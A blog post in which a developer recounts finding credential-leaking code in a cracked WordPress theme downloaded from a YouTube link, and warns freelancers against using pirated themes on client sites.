So recently, my friend downloaded a theme for WordPress. The theme was called WoodMart. My friend got the theme from a YouTube channel. The YouTube channel was providing the theme for free through a Google Drive link in the description, so my friend didn't think much about it. He was a beginner freelancer, so he wanted to build the website for the client as cheaply as possible because beginner freelancers usually get less money for website-building projects.
Basically, it is a premium theme. It costs $59, and one client can only have one theme license.
But what my friend did was download a ZIP folder of that theme from the YouTube channel and build an e-commerce website on top of it.
So basically, as a cybersecurity specialist, first of all I want to say: beginner freelancers, listen to this properly.
If you are getting any premium theme, like a cracked version of a theme or any ZIP folder from an unknown source, please don't download it. It is vulnerable, and the malware and security risks are high. It can leak your client's data, secrets, and API keys, and there is a high chance of getting hacked.
My friend had built the whole website. The payment gateway and shipping manager had done all the setup and logins, but the theme was cracked. The theme was running perfectly, but to run that theme properly, a valid license key is required. This key should come directly from the official WoodMart website.
Even without the theme license it was working properly but it was giving your data and leaking your data and was not secure.
I just want to say something about the WoodMart theme in WordPress so you know what it is.
First of all, the theme is premium. It costs $59 per license. You can say one license costs $59.
The purchased theme gives you updates, custom features, and support. If you have any problems, you can get personal support and assistance.
It is free from suspicious malware and security issues. It is secure and helps keep your website clean.
But my friend downloaded a ZIP folder of the premium WoodMart theme from a YouTube channel that was providing it for free and installed it on the client's website.
After that, when I was doing a security review and helping write the website's policies, I asked him, "Where did you buy the theme? Where is the key? Have you really bought the theme or not?"
He said no and told me he got the theme from that YouTube channel.
From there, I started scanning the folder because it was suspicious. No YouTuber can legally provide a premium product for free.
So what I did to fix this problem was scan the files. First of all, I am a software developer. I make AI tools and websites, so I know a bit about websites. Yes, I am BCA too.
I created a prompt and gave it to Claude Code along with the ZIP file. Claude Code scanned the whole ZIP file and looked for vulnerabilities and security issues so I could confirm whether the file was harmful or not.
Here is what I got after scanning the file with my prompt.
After seeing this, I realized that the theme was indeed suspicious. Inside the PHP files, there was suspicious credential leakage code and custom code that could leak passwords. It could also be used for hacking, scanning the website, and doing many other things. It was very risky for the client.
This kind of code can expose your passwords to attackers, and hackers can potentially gain control of your website. They can access credentials, monitor activities, and compromise your system. It was very dangerous.
So after that, I told my friend, "You should buy the theme directly and replace this version as soon as possible. It is very suspicious, and it goes against security best practices. You need to buy the original theme so you can properly maintain the website and its policies."
So I also want to say this to everyone: don't buy or download cracked versions.
For your client projects or production websites, never use cracked versions. Some people use them for testing, but I don't recommend that either because they are very dangerous and insecure.
Even if you are using a VPS for your own testing, I still suggest avoiding cracked software because of the security risks involved.
I have also provided the prompt that I used with Claude Code to scan the ZIP file. I encourage you to use a similar approach on any ZIP file you download so you can get a report about whether the file is secure or not.
I also want to say this to all freelancers:
Building websites for clients is a great way to learn, earn, and gain experience. But don't build a website using cracked themes or suspicious ZIP files. If you are building a website, you should respect security practices and protect your client's website. Security is part of your responsibility.
You should also perform regular maintenance and security checks over time to ensure everything remains secure.
This experience taught me an important lesson, and I wanted to share it with all of you.
And yes, my English is not perfect, so please ignore any remaining mistakes. I hope you found this useful.
Top comments (0)